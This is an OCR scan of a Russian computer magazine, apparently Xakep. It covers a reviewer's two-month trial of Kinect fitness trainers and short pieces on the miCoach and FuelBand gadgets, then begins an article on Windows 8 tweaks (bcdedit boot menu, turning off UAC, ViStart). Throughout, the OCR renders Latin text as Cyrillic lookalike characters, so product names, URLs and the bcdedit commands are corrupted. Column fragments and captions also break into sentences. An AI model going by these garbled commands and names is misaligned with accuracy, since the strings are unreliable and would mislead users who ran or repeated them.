от Зопу, МісгозоЙ и ІМіпІепсІо. Из них только ХЬох с его КіпесТом 
оцифровывают и переносят в виртуальное пространство все 
тело человека. Что для «виртуального тренера», который дол- 
жен отслеживать и оценивать движения не только рук, но и ног 
и корпуса, выглядит более логичным. 




ВЫБОР ПРОГРАММЫ 

Из электротренеров наиболее популярны: 

• Ѵоиг ЗІіаре: Рііпезз ЕѵоІѵесІ 1 , 2; 

• І\Ііке+ КіпесПѴаіпіпд; 

• ІІРС РегзопаІ Тгаіпег: ТЬе Шіплаіе Рііпезз Зузіет. 

Ѵоиг ЗНаре: Рііпезз ЕѵоІѵесІ (201 1 , 2012) 

Ѵоиг ЗІіаре: Рііпезз ЕѵоІѵесІ — очень неплохая система с явным 
перекосом в сторону женского пола. Здесь ты можешь выбрать 
себе тренировочную программу с учетом поставленных целей 
(руки-плечи, ноги, похудение, восстановление после, простите, 
родов) и раз за разом ее реализовывать. Программа адекват- 
но оценивает твои движения, показывает недостатки техни- 
ки, начисляет баллы и считает калории. Кроме тренировочных 
программ, есть прикольные фитнес-игры на скорость и баланс 
и китайская медитативная гимнастика 2еп, которая поначалу 
раздражает, а потом внезапно начинает радовать и успокаивать. 

Во второй части есть прикольный момент: когда ты бежишь 
на месте, твое альтер эго на экране передвигается по краси- 



вейшим зарубежным городам, благодаря чему создается не- 
плохая иллюзия уличной пробежки. 

Ставить на себе эксперимент по тренировке с этой систе- 
мой я не стал по психологическим причинам — тренер-женщи- 
на и реклама ѴѴотеп’з НеаШі в виртуальном спортзале. Для че- 
ловека с опытом подвальной качалки в Свиблово это тяжело :). 

ІІРС РегзопаІ Тгаіпег: ТНе Шіітаіе Рііпезз Бузіет 

На этот раз никаких женщин — тренировочная система с явным 
уклоном в сторону боевых единоборств встречает нас сообще- 
нием «рипсЬ Іо зіагі». Порадовало очень адекватное фитнес- 
тестирование, оценивающее не какие-то извращенные упраж- 
нения, а всем понятные отжимания и скручивания на пресс. 
Выдает оценку, четко спрашивает, будешь ли ты заниматься 
с отягощениями или только со своим весом, и — вперед! Сама 
система оставляет после себя приятное впечатление (и вовсе 
не потому, что игра в Х0Ю2 и легко нарезается на болванки!), 
но я никогда не был фанатом единоборств. Пришлось вставлять 
следующий диск. 

№ке+ КіпесіТгаіпіпд 

Вставляю диск, смотрю интру, прохожу фитнес-тестирование. 
Фитнес-тестирование исследует мою способность к выполне- 
нию довольно извращенных упражнений, вроде прыжков и при- 
седаний на одной ноге. По сравнению с внятными отжимания- 
ми из ІІРС это напрягает, но я продолжаю. Хотя я сделал больше 
чем до фига приседаний на одной ноге, большинство из них мне 
не засчитали — суровый тренер обещал засчитывать только 
«идеальную технику», а в чем заключается ее идеальность, я по- 
нял не сразу (кому я вру, до сих пор не разобрался...). 

Несмотря на не совсем справедливую оценку моей подго- 
товки (Майкрософт без глюков не может!), общий балл полу- 
чился неплохим, и я решил продолжить. 

Итак, передо мной персональная тренировка, испытания, 
пятиминутная тренировка. Выбираю «Силу» как цель моей бу- 
дущей программы, и лысый дядя (бывший футболист, ныне — 
найковский тренер), шуруя кремниевыми мозгами в глубине 
ХЬох’а, с учетом данных моего тестирования сочиняет мне про- 
грамму на месяц. Соглашаюсь заниматься три раза в неделю. 
Да будет эксперимент! 

Первая неделя 

Разминка, основной курс, растяжка. Очень круто — раньше 
я ленился и делал разминку кое-как. Теперь, когда за этим сле- 
дит нарисованный человек из телеэкрана, я начал ее делать. 
Удивительно, как могут заставить пропотеть упражнения, вы- 
полненные с собственным весом на площадке в пару квадрат- 
ных метров площадью. Осознаю, что по сравнению с тренером 
моя скорость при выполнении бега с высоким подъемом коле- 
ней, прыжков по квадрату и прыжков на одной ноге удручающе 
низкая. Мои достаточно крепкие ноги, которыми я несколько 
лет назад жал по 240 кг, двигаются очень медленно. 



КЛАССИКА ИЛИ СОВРЕМЕННОСТЬ? 



Фундаментальные подходы к фитнесу за послед- 
ние пару десятков лет вряд ли сильно измени- 
лись. Анаэробные тренировки, качалочка? Все 
также достаточно ржавых гантелей, штанги, тур- 
ника и брусьев. Аэробные тренировки? Неважно, 
как ты будешь достигать целевого пульса — ве- 
лотренажером за >9000 долларов, доставшейся 
в наследство от сестры скакалкой или вообще 
бегом на месте с высоким подъемом коленей. 

А с другой стороны, мышцы управляются 
нервами, нервы подключены к головному мозгу, 
поэтому мотивация — один из самых главных 
компонентов нормального тренинга. Вот какие 
плюсы айти-подхода к тренировкам мы выявили: 



Социальные функции. Возможность показать 
себя и посоревноваться с друзьями через 
социальные сети — великий мотиватор. 
Некоторые люди удивляются, что автомати- 
ческие постинги в фейсбуке в духе «прошел 
X километров, потратил V калорий» собирают 
больше лайков и комментов, чем глубокомыс- 
ленные политические полотнища. 

Удобство расчетов и статистики. Можно 
бегать по бумажной карте и считать пульс 
обычным пульсометром. Но иметь програм- 
му в смартфоне, которая сама будет тебе 
сигнализировать о достижении целевого 
пульса, подгонять тебя звуковыми сигналами 



и публиковать все твои достижения онлайн, — 
намного круче. 

Оказалось, что электронный тренер вполне 
может составить тебе программу и прокон- 
тролировать технику. И мотивировать не хуже 
реального тренера! Причем цена вопроса — 
2000 рублей за диск. Кажется, впервые после 
покупки РаІІоиѣ 3 я не пожалел о потраченных 
финансах :). Какой-то загружаемый контент 
к играм полагается, но, во-первых, мой ХЬох 
не подключен к сети (если вы понимаете, 
о чем я!), а во-вторых — ненавижу покупать 
загружаемые контенты. Только диски, только 
хардкор! 
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АйЮАЗ МІСОАСН 

Сергей Мельников, заместитель главного редактора журнала «Железо» 



Когда началось повальное увлечение фитнес- 
браслетами, для себя я сразу решил отказаться 
от подобных гаджетов — роль главного элемента 
браслета, акселерометра, прекрасно выполня- 
ет мой іРІіопе со спортивными приложениями. 

К тому же браслеты подходят для бега и других 
активных движений, но полностью игнорируют 
велосипед или силовые тренировки. Если уж 
браться за жиры, так со всей серьезностью и на- 
учно-техническим подходом! 

Бессменный компаньон каждого современ- 
ного фитнес-гика — пульсометр, который куда 
точнее акселерометра оценивает, какую нагрузку 
получает организм. Мой выбор пал на комплекс 
Асіісіаз МіСоасГі, состоящий из нагрудного 
пульсометра и беспроводного адаптера к іРГюпе. 
Работая в паре со смартфоном, в котором есть 
гироскоп и СР5, МіСоасГі представляет собой 
убер-машину для спорта. 



Сперва начались утренние пробежки с нагруд- 
ным пояском пульсометра. Программа МіСоасІі 
провела со мной ознакомительную тренировку, 
определив мои диапазоны пульса под разной 
беговой нагрузкой, а потом составила грамотную 
программу тренировок. Начиная с разминки, 
МіСоасІі спустя несколько минут уверенным 
мужским голосом говорил мне через наушники 
ускориться, вытереть сопли-слюни, сжать нервы 
в узду и стремиться к победе и снижению веса. 
После 20-30 минут бега, дыша, как спаниель, 
я мог наблюдать свой маршрут на картах Соодіе, 
а также подробные графики скорости, пульса 
и карту высот. На выходе получались вполне точ- 
ные показатели сброшенных калорий. 

Летом я пересел с автомобиля на велосипед, 
чтобы наслаждаться видом набережной по пути 
на работу. В первую поездку туда-обратно решил 
не брать пульсометр, ограничившись телефоном 



с МіСоасІі. Телефон «порадовал», что за со- 
рок минут путешествия я сбросил жалкие 200 
калорий, — откуда ему знать, что на улице +30 
и сердце мое изнывало, пока на жаре я крутил 
педали в долгую горку. На следующий день ком- 
плекс был дополнен пульсометром, и по итогам 
поездки меня ждал совершенно другой резуль- 
тат — 500 калорий! Очень серьезная разница 
была вызвана тем, что пульсометр чувствовал, 
как с меня сходит седьмой пот, а сердце стучит, 
что штамповальный станок, во время езды в гору. 

Со временем я отказался от программы 
тренировок Асіісіаз, ограничившись лишь мони- 
торингом активности, — на большой спорт меня 
не хватило, но всегда было интересно узнать, 
какую пользу я получил от пробежки или поездки. 
Видимый результат, пускай не в сброшенных 
граммах, а лишь в цифрах калорий, прибавляет 
энтузиазма. 



Удивительно, как могут за- 
ставить пропотеть упраж- 
нения, выполненные с соб- 
ственным весом 



Что делать — я никогда не выполнял подобных упражнений. 
Оказалось, что и равновесие у меня страдает. Под тактичные 
сообщения тренера «держите равновесие» и «вес на пятки!» 
пытаюсь не заваливать корпус. Пока получается не очень. 

Вся силовая тренировка занимает полчаса, упражнения 
выполняются по одному подходу, без отдыха. Большинство 
упражнений исключительно на ноги, спину и мышцы кора (мы- 
шечного корсета). Руки практически не задействованы (а хо- 
чется). Впервые знакомлюсь с упражнениями, направленными 
на развитие скорости и равновесия. 

После завершения основного курса тренер предлагает по- 
вторить его еще на 15 минут, но сил нет — не соглашаюсь, про- 
шу перейти к растяжке. 

Почему я не делал растяжку раньше? Было лень! А теперь, 
когда для зачета тренировки ее нужно сделать, я наконец-то по- 
нял, что это приятно. 

Через день — кардиотренировка. Упражнения практически 
те же, но злой тренер дозволяет перерывы по 30 секунд, сопро- 
вождая их словами «вы отдыхаете, а ваше тело сжигает жир. 
Не забывайте пить воду» и огромным таймером на пол-экрана 
с обратным отсчетом. Вторую серию упражнений опять не оси- 
ливаю. 

Вторая неделя 

Прошла легче. Иногда удается брать второй цикл основных 
упражнений. В основном — в выходные. 

Третья неделя 

Разрешили взять гантели. Из 25 упражнений с весом только 
два — тяга к поясу и румынская становая тяга. Но я не огор- 
чен — продолжаю развивать скорость, реакцию (игра в выши- 
балы и бег с препятствиями) и чувство равновесия. Никогда 
раньше не пробовал прыжки на одной ноге вперед и в сторо- 
ны, приседания на одной ноге и приседания-сумо. Упражне- 
ния оригинальные и кажутся высосанными из пальца, но в за- 



Семейство гаджетов Асіісіаз 
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рубежных журналах я их встречал. Так что, наверное, это и есть ѴоигЗИаре: Рііпезз 

порождения сумрачного гения тех самых «мировых тренеров». Еѵоіѵес) и Ыіке+ Кіпесі 
Кстати, внезапно появился тянущий дискомфорт в пояс- Тгаіпіпд 
нице. Раньше такого не было, даже когда активно приседал 
со штангой :). 

Четвертая неделя 

Вроде бы все те же упражнения, а пот льет в три ручья — до- 
бавили секунд к каждому упражнению. Похоже, что этот лысый 
цифровой дядя умеет напрягать своих подопечных. 

Не получается брать дополнительное время после основных 
занятий, [де же упражнения на руки? Делаем только короткие 
отжимания (без сгибания локтей) и тягу гантелей к поясу. 

Фитнес-тестирование 

После окончания серии из 12 занятий считается, что я отрабо- 
тал месячную программу и надо проходить фитнес-тестиро- 
вание, чтобы тренер смог разработать мне новую программу. 

О’кей, не вопрос. 

При тестировании я забыл отодвинуть диван и недостаточ- 
но отводил колено вперед при приседаниях, в результате чего 
лысый дядя не зачел мне прыжки через барьеры (при проходе 
крайнего правого барьера я врезался в диван) и приседания 
на одной ноге (опять!). Приседания я ему простить до сих пор 
не могу, а в итоге он насчитал мне на 15 баллов меньше, чем 
на первом тестировании! И это при том, что я реально продви- 
нулся во всех его извращенных упражнениях и даже освоил 
«выпады с прыжком»! 



Итоги двухмесячного эксперимента 

Крис Касперски четырехполосную статью писал за восемь ча- 
сов. Я, получается, потратил два с лишним месяца :). И вот ка- црсРегзопаіТгаіпег: 
кие выводы я могу сделать по результатам этого эксперимента. тне Шіітаіе Рііпезз 

Плюсы: Зузіет 

• Наконец-то научился дисциплинированно делать разминку 
и растяжку-заминку. Растяжка оставляет после себя очень 



приятные ощущения в мышцах, жалко, что я раньше ее 
не делал. Как-то так получалось: пару раз махнул руками, 
чуть поприседал -подвигался и схватился за штангу... после 
занятий со свободными весами устал, дополз до дома, упал 
на диван. 

Реально увеличил свою скорость, реакцию и чувство равно- 
весия. Почему-то меня очень порадовало, что теперь я могу 
делать ласточку, выпады с прыжком и махи ногами без от- 
клонения корпуса. 

Реально выросла выносливость. Я езжу на работу на вело- 
сипеде, раньше мне было тяжело заниматься после приезда 
домой. Сейчас — нормально! 

Можно соревноваться с друзьями из интернетов и достигать 
разных ачивок (типа уклонения от десяти мячей подряд или 
бонуса за идеальную технику). В интернете мне ни с кем со- 
ревноваться не хотелось, но теоретически это возможно. 

Минусы: 

Занимаясь по программе «Сила», я не стал сильнее :). Точ- 
но говорю: если бы эти два месяца я делал базу со штангой 
и гантелями, отжимания с рюкзаком и подтягивания — я бы 
точно вернул себе часть утерянной формы (как делал уже 
много раз, хе-хе). Кроме того, я уверен, что стояние по 60 
секунд в так любимой за рубежом «планке» развивает мыш- 
цы кора хуже, чем обычные отжимания с блинами на спине. 
Занятия почти не вовлекают руки. Может быть, дальше все 
изменится, но пока — короткие отжимания, обычные отжи- 
мания на 10 повторов и тяга гантели к поясу. По одному под- 
ходу, и то не каждое занятие. 

Самое главное: нет учета дополнительного веса, который 
ты берешь для упражнений. Программа не спрашива- 
ет, сколько именно весят твои гантели, и считает калории 
и очки Ыіке РиеІ без учета этой информации (ей интересен 
только твой личный рост и вес). Она не считает твой про- 
гресс по увеличению весов! То есть ты можешь приседать 
с двухпудовой гирей (и в трехболтовом водолазном костю- 




НАШ ПОДОПЫТНЫЙ 

29 лет, в начале века занимался в под- 
вальной качалке, увлекался приседа- 
ниями со штангой и становой тягой, 
в результате чего из 60-килограммово- 
го рахита превратился в 86-килограм- 
мового обычного человека. Послед- 
нюю пару лет занимался по уникальной 
системе «шаг вперед — два назад, 
две-три недели перерыв» с использо- 
ванием турника, брусьев и домашнего 
набора гантелей и штанги. 
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Если бы два месяца я делал базу 
со штангой и гантелями, отжи- 
мания с рюкзаком и подтягива- 
ния — я бы уже вернул форму 




ме с утяжеленными галошами), а можешь с резиновым утенком — 
компьютеру все это без разницы. 

• Очень странная система учета ІМіке РиеІ. Степану его браслет за сут- 
ки обычного хождения на работу прописывает по три тыщи «попуга- 
ев», мне — за достаточно жесткую тренировку перепадает хорошо 
если четыре сотни ІМіке РиеІ. Обидно! 

• Не слишком адекватная система твоих фитнес-достижений под на- 
званием РиеІРгіпІ:. Думаю, что и несовершенство сенсора здесь име- 
ет значение. 

Итого: 

Ты не станешь Шварценеггером, занимаясь по этой программе. 
Твои руки не станут бугриться мышцами, ты не сможешь поднимать на- 
ковальни над головой и не победишь в первенстве района по жиму лежа. 

Она годится в качестве хард-версии зарядки, это фитнес, здоровый 
образ жизни, формирование обычного подтянутого тела. Что, если вду- 
маться, не так уж мало. □С 




МІСРОЗОРТѴЗ 50МѴѴЗШТЕШ 

Наш коллега Александр Каныгин, бывший редактор Сате.ЕХЕ, 
главный редактор «РС Игры», главный редактор капоЬи.ш и ны- 
нешний редактор журнала «Максим» (и ко всему этому большой 
фанат Зопу РІауЗіаііоп), проходя мимо, отрицательно высказал- 
ся об ХЬох + Кіпесі. Дадим ему слово! 

РІауЗіаііоп 3 и ее система Моѵе — не то же самое, что Кіпесі. 
Это, скорее, аналог контроллера ѴѴіі: пользователь держит 
в руках странную палку с кнопками и круглым набалдашником 
(в интернете ее сразу назвали дилдо) и размахивает ей, чтобы 
управлять персонажем в игре. То есть о задействовании всего 
тела речи нет, с Моѵе можно играть и сидя на диване. Вместе 
с тем Моѵе работает куда точнее и быстрее, чем ІЧіпіепсіо ѴѴіі 
и ХЬох 360 с его Кіпесі:. Учитываются малейшие движения 
контроллера, его наклоны и перемещения в пространстве. Моѵе 
не требует для работы много места, и ему не нужно хорошее 
освещение. В комнате, где Кіпесі работать отказался (сначала 
он 452 раза попросил «отойти подальше», «провести калибровку 
заново» и прибавить света), система работала отлично. 

Теперь о плохом: покупая игру для Моѵе, нужно убедиться, 
что она требует только одну дилду, многим требуется сразу две. 



БЕГИ ЗА МНОЙ 

Для бега не нужно сложного оборудования. Подбери удобную 
одежду и обувь — ив путь. Зато для бегунов придумана куча софта, 
ведь происходящее так легко фиксировать и мерять. Популярны 
трекеры Епсіотопсіо ( епсіотопсіо.сот ). ВипКеерег ( гипкееоег. 
сот ) и Ыіке+ Пиппіпд ( пікеоіиз.піке.сот ). Все они бесплатны 
и доступны для ЮЗ и АпсІгоісІ, поэтому ты можешь сам выбрать 
то, что тебе подходит. В ВипКеерег большой упор на статистику, 
в Епсіотопсіо — на социальный функционал, а в Ыіке+ — на мо- 
тивацию (с помощью устного подбадривания или отобранной 
пользователем музыки). Еще стоит отметить чудное, хотя и плат- 
ное приложение ІотЬіез, Пип! ( готЬіезгипаате.сот ). Здесь 
геймификация процесса доведена до абсолюта: для пользователя 
это не просто бег по маршруту, а целая история, в которой ему 
нужно решать различные задачи в вымышленном мире. 



ШКЕ+ гцЕишю 

Стёпа «зіер» Ильин, главред 

В последнее время все чаще приходится объяснять, «что это 
за гаджет такой на руке». І\1іке+ РиеІВапсі — черный (хотя есть 
и другие цвета) браслет, на котором выводится активность 
на день. Все просто: чем больше двигаешься, тем больше баллов 
(так называемых РиеІ’ов) набираешь. Помимо условных баллов, 
можно посмотреть количество шагов за день и сожженных 
калорий. На первый взгляд не гаджет, а полная фигня. На деле — 
проверено лично — жутко мотивирующая штука. Совершенно 
разные чувства, когда в конце дня смотришь на жалкие 2000 
баллов и думаешь про себя: «Какой же ты овощ, чувак» — и со- 
всем другое дело видеть на экране цифру 4000 и ощущать, 
какой активный был день. В любой дополнительной нагрузке, 
пусть даже прогулке по жаре, которую раньше всеми силами бы 
отвергал, теперь появляется новый смысл — трендовый термин 
даплііісаііоп в действии. Тут еще срабатывает эффект сравнения 
с другими. Так получилось, что РиеІ Вапсі есть у многих знакомых 
и друзей. Поэтому, быстро засинхронизировавшись со специ- 
альной программой, можно сравнить свои результаты с другими. 
Несмотря на все мои попытки и потуги, выше третьего места 
я еще не поднимался. Есть куда стремиться — решил бегать 
в парке не реже двух раз в неделю. 










Колисниченко 
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Материалов, описывающих ѴѴіпсІоѵѵз 8 
с пользовательской точки зрения, в ][ почти 
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не было. Однако прошел почти год с момента 
выхода новой ОС, и игно рировать ее вс ^|(ЯИв| 
сложнее. «Восьмерка» поставляется со всеми^ 1 
новыми компьютерами, и велик шанс, что тебе 
или кому-то из твоих друзей и близких придется 



иметь с ней дело. Все-таки не у всех есть лишняя 
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В конечном счете есть и люди, которым 
«восьмерка» нравится. Кто-то любит 
гибридные ноутбуки, кому-то нужна ин- 
теграция с облачными сервисами и со- 
циальными сетями, а кому-то просто симпатичен 
Меіто-дизайн. У всех свои причины, и глупо кого- 
то переубеждать и обращать в свою религию. 

Еще одним поводом к написанию этой ста- 
тьи стал выход предварительной версии ѴѴіпсІоѵѵз 
8.1. В МісгозоЯ: обещали, что бесплатный апдейт 
пофиксит проблемы, которые так злили пользо- 
вателей, но пока слова разработчиков не подкре- 
плялись делами. Например, кнопка «Пуск» дей- 
ствительно вернулась, но функций классического 
меню она не получила. Нажав на «Пуск», пользо- 
ватель попадает обратно в стартовый экран Ме- 
тро и лишь оттуда может запустить приложения. 
Но смысл-то был в том, чтобы запускать прило- 
жения из десктопного режима! Пользователи, жа- 
ловавшиеся на отсутствие «Пуска», руководство- 
вались вовсе не ностальгией. Если ты работаешь 
над документом, необходимость провернуть два 
лишних действия, чтобы запустить программу, 
приводит к потере концентрации. В общем, в но- 
вой версии «восьмерки» действительно много из- 
менений, но ни одно из них не решает проблемы 
пользователей десктопов и ноутбуков. Придется 
взять ситуацию в свои руки. Давай воспользуемся 
накопленным за год опытом и превратим «вось- 
мерку» в рабочую ОС. 



ВОЗВРАЩАЕМ НАМЕСТО 
СТАРЫЙ ЗАГРУЗЧИК 

Предлагаю начать с загрузки системы. Спра- 
шивается, а что в ней не так? В «восьмерке» по- 
явилась так называемая среда восстановления 
ѴѴіпсІоѵѵз. Раньше все было просто: нажал <Р8> 
при загрузке и быстро вышел ко всем необхо- 
димым режимам — к безопасному режиму, без- 
опасному режиму с поддержкой сети и так далее. 
Сейчас же в дебрях системы восстановления 
можно попросту заблудиться, не говоря уже 
о двойной перезагрузке. Например, чтобы до- 
браться к привычным режимам, нужно выполнить 
следующие действия: 

• войти в среду восстановления (или нажать 
Пезеі, и она запустится сама, или удерживать 
5НІТ1: при выборе команды «Перезагрузка»); 

• далее выбрать команду «Диагностика — > До- 
полнительные параметры — > Параметры за- 
грузки», после чего нужно перезагрузить 
комп, и только после этого ты увидишь при- 
вычные команды! 

Не слишком ли запутанно? И я тоже так думаю. 
Поэтому предлагаю вернуть старый добрый за- 
грузчик, который был в ѴѴіпсІоѵѵз 7. Кому это не нуж- 
но, может с чистой совестью пропустить данный 
раздел и перейти к следующему. 

Открой окно командной строки от имени ад- 
министратора. После этого введи команду: 



ЬссІесШ: /сіеіеііеѵаіие {сиггепі:} <-» 
Ьоо1:тепиро 1ісѵ 

Если ты все правильно ввел, то получишь со- 
общение о том, что все прошло успешно. Теперь 
у тебя будет привычный загрузчик и будет рабо- 
тать клавиша <Р8> — все как обычно. Если пона- 
добится вернуть все назад, набери в консоли, за- 
пущенной с правами администратора: 

ЬссІесШ: /зеі: {сиггепі:} Ьооіітепироіісу <-< 



ОТКЛЮЧЕНИЕ ІМС 

Не знаю, как тебя, но меня окошко ІІАС осно- 
вательно достало, тем более что толку от него 
немного. Поэтому запусти панель управления 
(перейди на рабочий стол, нажми <ѴѴіпсІоѵѵ5 + Н> 
и введи команду сопігоі). После этого перейди 
в раздел «Учетные записи пользователей» и щел- 
кни по ссылке «Учетные записи пользователей», 
а затем — по «Изменить параметры контроля 
учетных записей». Осталось только перетянуть 
заветный ползунок вниз и нажать кнопку «ОК». Но 
не забывай, что отключение ІІАС сделает твою 
систему менее защищенной. Решать тебе. 

УСТАНОВКА НОРМАЛЬНОГО 8КѴОШѴЕ 

В «восьмерке» есть поддержка ЗкуОгіѵе из короб- 
ки. Но поддержка эта какая-то кривоватая, точ- 
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Приводим в чувство 1/1 /ІПСІОѴѴ5 8 







Рис. 1 . Выполнение ЬссІесШ Рис. 2. Реакция на нажатие <Р8> при загрузке системы 






ВНИМАНИЕ 



Программа ѴіЗіагі до- 
вольносвоеобразная. 
Если хочешь вернуть 
«все, как было», то про- 
стой деинсталляцией 
программы не отдела- 
ешься: убирать за собой 
она не умеет. Как по мне 
(покаты еще читаешь 
эти строки, а не присту- 
пил к издевательствам 
над «восьмеркой»), 
лучше сделать точку вос- 
становления, установить 
программу, а если не по- 
нравится - произвести 
откат с созданной точки 
восстановления. 



Рис. 3. Отключение ІІАС 



Рис. 4. ЗкуОгіѵе интегрирован в проводник 



нее неполноценная. Дело в том, что есть только 
Меіго-приложение Зкуйгіѵе, которое работает, 
соответственно, только в Меіто. Но ведь работают 
с файлами в проводнике, а вот в нем поддержки 
Зкуйгіѵе как раз и нет. Да и что делать тем, кто от- 
ключил Меіто? 

Не знаю, может, и не открою Америки, если 
скажу, что нормальный Зкуйгіѵе есть в составе 
І_іѵе Еззепііаіз. Бесплатно скачать этот набор про- 
грамм можно по адресу Ы1:.Іѵ/13КѴкЦ4 . После чего 
в твоем проводнике появится элемент ЗкуБгіѵе: 
работать с ним можно, как с обычной папкой (при 
первом запуске только нужно указать твой І_іѵе Ю). 

ОТКЛЮЧАЕМ МЕТПО, ДЕЛАЕМ КНОПКУ 
«ПУСК» И НОРМАЛЬНЫЙ ПОИСК 

Из двустволки, если сильно повезет, можно сра- 
зу убить двух зайцев, а с помощью программы 
ѴіЗіаП: мы сейчас убьем (не попытаемся, а имен- 
но убьем) трех зайцев сразу. А именно: мы от- 
ключим Меіто, сделаем привычную кнопку «Пуск» 
и реализуем нормальный поиск. Сразу хочу 
отметить, что ѴіЗіагі: — это только одна из про- 
грамм, подходящих для данной задачи. В Сети 
можно найти десятки других, как платных, так 
и бесплатных. 

Спрашивается, зачем нужно отключать Меіго, 
если это изюминка ѴѴіпсІоѵѵз 8? Лично я вижу тому 
три причины: 

• Меіго хорош для обладателей сенсорных экра- 
нов. Если такого экрана у тебя нет, то Меіго 
как бельмо на глазу. Все равно после входа 
в систему нажимаешь плитку «Рабочий стол». 

• Меіто- приложен ия не так функциональны, 
как хотелось бы. Покажи мне хоть одно Меіго- 
приложение, которое бы по своему функцио- 
налу превосходило настольную версию. 

• Попробуй объяснить, как работать в Меіто, 
маме, папе, дедушке и бабушке, которые 
только ХР освоили с горем пополам, а тут уже 
что-то новое! 



В общем, Меіто в наших реалиях — это 
как «Феррари» по нашим кривым дорогам — кра- 
сиво, небесполезно. 

Теперь о кнопке «Пуск». Лично мне бы хоте- 
лось ее вернуть. Чтобы при ее нажатии открыва- 
лось привычное меню «Пуск» или хотя бы что-то 
подобное ему. 

ѴіЗіагі, кроме всего прочего, решает и про- 
блему с поиском. Поиск в ѴѴіпсІоѵѵз 8 хорошего 
слова не заслуживает. Видимо, в Майкрософт хо- 
тели как лучше, а получилось как всегда. 

Итак, устанавливаем программу. С установ- 
кой проблем не возникает, а при первом запуске 
программа попросит выбрать стиль меню «Пуск». 
Консерваторы выбирают ѴѴіпсІоѵѵз 7, а те, кому 
хочется чего-то нового, — любой другой вариант 
(рис. 5). 

Следующий шаг очень и очень важный. Про- 
грамма обнаружила, что родной кнопки «Пуск» 
у нас не было, поэтому она предлагает ее устано- 
вить. Перед тем как нажмешь на кнопку «ІпзІіаІІ», 
убедись, что стоит флажок Зкір плеіто... Когда 
он включен, при входе в систему ты сразу по- 
падешь на рабочий стол, а не на экран Меіго. 
По сути, программа не отключает Меіто полно- 
стью, как это делают некоторые другие програм- 
мы, а лишь переключает на рабочий стол при вхо- 
де в систему. 

Все! Нажимаем клавишу ѴѴіпсІоѵѵз и наслаж- 
даемся, как меню «Пуск», так и новым и удобным 
поиском (рис. 7). Кнопка «Пуск», появившаяся 
на своем законном месте, полностью рабочая. 
Вот только ее внешний вид мне совсем не нра- 
вится. Щелкни на ней правой кнопкой мыши, 
и ты увидишь меню, изображенное на рис. 8. Ко- 
манда ЗІіоѵѵ Меіто показывает Меіто-интерфейс, 
если ты им захочешь воспользоваться, а команда 
Ріск а пеѵѵ Зѣагі: Виііоп ітаде позволяет выбрать 
новую картинку для кнопки «Пуск». В появившем- 
ся окне можно выбрать несколько вариантов изо- 
бражений, после чего кнопка «Пуск» будет такой 



же, как в ѴѴіпсІоѵѵз 7 (или вообще с лого Арріе — 
кому как нравится). Скриншот делать не хочется, 
думаю, ты поверишь мне на слово. 

Теперь несколько слов о Меіто. Как я уже го- 
ворил, программа не отключает его, а лишь пря- 
чет от «лишних» глаз. Есть программы (вроде 
ех7ТогѴѴ8), которые заменяют файл ехріогег.ехе 
версией из ѴѴіпсІоѵѵз 7. Но такие программы лич- 
но мне не нравятся. Во-первых, зачем уродовать 
систему, если все можно сделать без «хирурги- 
ческого» вмешательства. Во-вторых, нужен диск 
с дистрибутивом ѴѴіпсІоѵѵз 7, который не всегда 
есть под рукой. В-третьих, если захочешь запу- 
стить Меіто, то уже не сможешь. 

Программа ѴіЗіагі довольно гибка в плане 
Меіто. Щелкни на ее значке в системном трее 
и выбери команду Орііопз. Пройдемся по пара- 
метрам группы йезкіор (рис. 9): 

• Зіагі Ьиііоп зііоѵѵз ѴіЗіагі — так и должно быть, 
не Меіго же ведь показывать. 

• ВоІН ѴѴіпсІоѵѵз Кеу зИоѵѵ ѴіЗіагі — обе клавиши 
ѴѴіпсІоѵѵз на клавиатуре будут открывать меню 
«Пуск». Ты можешь настроить так, что меню 
«Пуск» будет открывать левая кнопка ѴѴіпсІоѵѵз, 
а правая тогда будет открывать Меіго. 

• ОізаЫе аІІ ѴѴіпсІоѵѵз 8 Ноі соппегз — позволяет 
отключить все «горячие углы» ѴѴіпсІоѵѵз 8. Я бы 
не стал этого делать. Ощутимого прироста 




Рис. 5. Выбор стиля меню «Пуск» 
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НОВЫЙ КЛЮЧ 
КОМАНДЫ 

зніггооѵга 



Получить доступ к среде 
восстановления можно 
и через командную стро- 
ку. Для этого у команды 
зііиісіоѵѵп появился но- 
вый ключ -/о: зИиісІоѵѵп 
А /о АО. 



ОгЬ ІпзіаІІаііоп 



К Іоокз Ііке уои'ге ігуіпд іо изе ѴіБіагі оп а 
зузіет іНаі Иа$ по огідіпаі зіагі Ьиііоп іо 
геріасе. То Ьеііег іпіедгаіе ѴіБіагі іпіо уоиг 
зузіет, ѵѵе гесоттепсі уои аззідп ап агеа оі 
уоиг іазкЬаг ѵѵНісН ѴіБіагі сап и$е. Апу іооІЬаг 
уои таке оп уоиг іазкЬаг саііесі "Біагі" ѵѵіІІ Ье 
сопзитесі Ьу ѴіБіагі. 

К уои сііск ’ІпзіаІГ ѵѵе ѵѵіІІ ігу іо сіо іЬіз {ог уои 
аиіотаіісаііу. ОіЬегѵѵізе іЬіб сііаіодие ѵѵіІІ 
сіізарреаг ѵѵЬеп ѵѵе Ьаѵе кэипсі іЬе “Біагі" іооІЬаг 
уои сгеаіесі. 

То ипіпзіаІІ іЬе зіагі іооІЬаг аі апуііте, гідНі 
сііск іЬе ѴѴіпсІоѵѵз іазкЬаг апсі зеіесі 
"ТооІЬагз" > "Біагі*. 

^ Бкір теіго апсі до зігаідЬі іо ту сіезкіор 
ѵѵИеп ту сотриіег зіагіз. (гесоттеп8е8) 

І_аіег ІпзіаІІ 




Рис. 6. Включи флажок и нажми «ІпзіаІІ» 



Рис. 7. Меню «Пуск» в ѴѴіпсІоѵѵз 8 



в производительности ты не получишь, а от- 
ключать тот же шарм-бар не хочется — если 
поработал с «восьмеркой» хоть с неделю, 
то наверняка уже к нему привык. В принципе, 
удобная и глазу приятная штука. По умолча- 
нию программа не отключает ни один из «го- 
рячих углов». 

В разделе Зіуіе можно выбрать стиль меню 
ѴѴіпсІоѵѵз 7, и тогда меню «Пуск» станет выглядеть 
еще привычнее (рис. 10). 

Лично мне программа очень понравилась. 
Единственный недостаток — команды меню 
«Пуск» на английском языке. Большинству чи- 
тателей наверняка будет все равно, а вот их 
родственникам придется освежать знания, за- 
бытые со школьных времен. Если с английским 
вообще все плохо, рекомендую обратить внима- 
ние на следующую программу в нашем обзоре — 
СІаззіс ЗІіеІІ. 

СІ.А88ІС8НЕЦ. 

СІаззіс ЗІіеІІ — это еще одна программа, позво- 
ляющая сделать интерфейс «восьмерки» более 
классическим. Причем она не только добавляет 
меню «Пуск», но и приближает к классике интер- 
